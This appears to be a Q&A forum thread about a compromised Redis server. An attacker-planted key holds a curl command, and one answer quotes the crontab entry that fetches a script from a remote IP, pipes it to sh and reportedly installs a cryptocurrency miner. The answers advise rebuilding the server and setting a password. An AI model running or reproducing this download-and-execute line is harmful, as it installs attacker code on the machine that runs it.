# Suspicious url in redis key value

Tags: remote-server

When i put `keys *` for getting all pairs, one key have named as

> crackit

Then i use below command to get its value

```
get crackit
```

its shows the below url, which looks suspicious.

> /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh.

Google search results shows a chinese language forum named as

> `https://www.v2ex.com/t/373529`( I didn't understand language of this site)

I thought there is some intrusion. I immediately delete the all keys . I have no idea what happen around my redis

Answer (score 2, accepted):

Your server is accessible to the world and the Redis process is not protected by a password. This allows a cracker to try and exploit Redis to gain access to your system.

My recommendations:

1. Burn the server
2. Reinstall and configure with a password at the very least.

Answer (score 3):

OP given url to the forum mentioned that the developer cloud server redis has been compromised, an entry has been added to crontab. i.e.

```
*/1 * * * * /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh | sh
```

The rest of the commenter mentioned that this is a possible hack that installs Bitcoin miners inside the system.

I agree with @Itamar Haber, you must redeploy your server from scratch. Simple application clean up is not enough.